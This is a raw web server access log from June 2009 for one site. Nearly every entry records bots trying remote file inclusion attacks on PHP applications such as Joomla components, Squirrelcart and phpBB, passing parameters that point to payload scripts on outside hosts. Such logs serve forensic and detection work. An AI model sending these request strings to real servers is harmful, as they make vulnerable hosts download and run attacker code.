117.74.99.225 - - [21/Jun/2009:11:18:56 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:18:58 -0700] "GET /logs/access_080525.log//includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:19:09 -0700] "GET /includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:19:09 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:19:09 -0700] "GET /logs/access_080525.log//includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:19:11 -0700] "GET /logs/access_080907.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:11:19:18 -0700] "GET /logs/access_090521.log%20%20//index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:11:19:18 -0700] "GET /logs/access_080412.log%20%20//index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:11:19:20 -0700] "GET /logs/access_080831.log/?sourcedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:19:23 -0700] "GET /logs/access_080907.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:19:24 -0700] "GET /logs/access_080503.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:19:29 -0700] "GET /logs/access_090521.log%20%20//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:19:29 -0700] "GET /logs/access_080412.log%20%20//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:20:02 -0700] "GET /logs/access_090226.log//includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:20:03 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:20:03 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:20:03 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:20:18 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:20:18 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:20:18 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:20:19 -0700] "GET /logs/access_090521.log%20%20//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:20:19 -0700] "GET /logs/access_080412.log%20%20//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:20:23 -0700] "GET /logs/access_090521.log%20%20//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:20:23 -0700] "GET /logs/access_080412.log%20%20//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:20:26 -0700] "GET /logs/access_080526.log/?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:20:29 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:20:29 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:20:29 -0700] "GET /logs/access_080808.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:20:33 -0700] "GET /logs/access_080330.log/?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [21/Jun/2009:11:20:44 -0700] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [21/Jun/2009:11:20:44 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:11:20:44 -0700] "GET /home.php?index=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:11:20:44 -0700] "GET /logs/access_090506.log%20%20/home.php?index=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [21/Jun/2009:11:20:44 -0700] "GET /logs/access_080907.log///?_SERVER[DOCUMENT_ROOT]=http://osungelec.co.kr/board/data/osung2/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:11:20:44 -0700] "GET /logs/home.php?index=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [21/Jun/2009:11:20:45 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://osungelec.co.kr/board/data/osung2/idv6.txt?%0D?? HTTP/1.1" 200 21024 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:20:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.27.203.107 - - [21/Jun/2009:11:20:52 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://osungelec.co.kr/board/data/osung2/idv6.txt?%0D?? HTTP/1.1" 200 105056 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.128.40 - - [21/Jun/2009:11:20:59 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20922 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:21:03 -0700] "GET /logs/access_080907.log///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:11:21:05 -0700] "GET /logs/access_090516.log%20%20/home.php?index=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:21:15 -0700] "GET /logs/access_080907.log///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:21:15 -0700] "GET /logs/access_080820.log///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:21:16 -0700] "GET /logs/access_080820.log///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:21:16 -0700] "GET /logs/access_090508.log//components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://nashville.bbb.org/modules/pf_survey/stylesheets/deid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:21:17 -0700] "GET /components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://nashville.bbb.org/modules/pf_survey/stylesheets/deid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:21:17 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://nashville.bbb.org/modules/pf_survey/stylesheets/deid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:21:21 -0700] "GET /logs/access_090508.log//components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://nashville.bbb.org/modules/pf_survey/stylesheets/deid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:21:22 -0700] "GET /components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://nashville.bbb.org/modules/pf_survey/stylesheets/deid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:21:23 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://nashville.bbb.org/modules/pf_survey/stylesheets/deid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.107 - - [21/Jun/2009:11:21:28 -0700] "GET /logs/access_080126.log///?_SERVER[DOCUMENT_ROOT]=http://osungelec.co.kr/board/data/osung2/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
218.27.203.107 - - [21/Jun/2009:11:21:28 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://osungelec.co.kr/board/data/osung2/idv6.txt?%0D?? HTTP/1.1" 200 105056 "-" "libwww-perl/5.79" "dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:21:29 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:21:30 -0700] "GET /logs/access_080514.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:11:21:35 -0700] "GET /home.php?index=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:11:21:35 -0700] "GET /logs/home.php?index=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:11:21:35 -0700] "GET /logs/access_090507.log/home.php?index=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [21/Jun/2009:11:21:44 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://osungelec.co.kr/board/data/osung2/idv6.txt?%0D?? HTTP/1.1" 200 21025 "-" "libwww-perl/5.79" "dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:21:45 -0700] "GET /logs/access_080707.log//components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://nashville.bbb.org/modules/pf_survey/stylesheets/deid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:21:50 -0700] "GET /logs/access_080707.log//components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://nashville.bbb.org/modules/pf_survey/stylesheets/deid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:22:10 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:22:10 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:22:10 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:22:18 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:22:19 -0700] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:11:22:20 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.41 - - [21/Jun/2009:11:22:20 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:22:33 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20922 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:22:48 -0700] "GET /logs/access_080831.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:22:55 -0700] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:22:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:23:00 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:23:09 -0700] "GET /logs/access_081009.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:23:09 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:23:09 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:23:09 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20922 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:23:12 -0700] "GET /logs/access_080318.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:23:15 -0700] "GET /logs/access_080501.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:11:23:27 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:11:23:27 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:11:23:27 -0700] "GET /logs/access_080503.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:23:28 -0700] "GET /logs/access_080503.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [21/Jun/2009:11:23:30 -0700] "GET /logs/access_080412.log/?sourcedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [21/Jun/2009:11:23:30 -0700] "GET /?sourcedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 200 21011 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [21/Jun/2009:11:23:30 -0700] "GET /logs/?sourcedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 200 105050 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:11:23:30 -0700] "GET /logs/access_080503.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:11:23:30 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:11:23:30 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:23:59 -0700] "GET /logs/access_080503.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:11:24:13 -0700] "GET /logs/access_080329.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:11:24:15 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:11:24:15 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:11:24:15 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:11:24:15 -0700] "GET /logs/access_080329.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:11:24:27 -0700] "GET /logs/access_090507.log/home.php?index=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.194.87.219 - - [21/Jun/2009:11:24:32 -0700] "GET /logs//index.php?pag=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:11:24:59 -0700] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:11:24:59 -0700] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:11:24:59 -0700] "GET /logs/access_080507.log%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:11:25:19 -0700] "GET /logs/access_080404.log%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:25:20 -0700] "GET /logs/access_080820.log///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:11:25:41 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:25:41 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:11:25:54 -0700] "GET /?path%5Bdocroot%5D=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 20995 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:11:25:55 -0700] "GET /?path%5Bdocroot%5D=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 20923 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.172 - - [21/Jun/2009:11:26:13 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.172 - - [21/Jun/2009:11:26:14 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.172 - - [21/Jun/2009:11:26:14 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:26:34 -0700] "GET /logs/access_080831.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:11:26:37 -0700] "GET /logs/access_080808.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:11:26:40 -0700] "GET /logs/access_090516.log%20%20/home.php?index=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:11:26:46 -0700] "GET /logs/access_090506.log%20%20/home.php?index=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:26:47 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:26:47 -0700] "GET /logs/access_080723.log%20%20//plugins/safehtml/safehtml.php?dir[plugins]=http://www.c21vox.tv/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:26:47 -0700] "GET /logs/access_080717.log%20%20//plugins/safehtml/safehtml.php?dir[plugins]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:26:47 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:26:52 -0700] "GET /logs/access_080831.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [21/Jun/2009:11:27:19 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
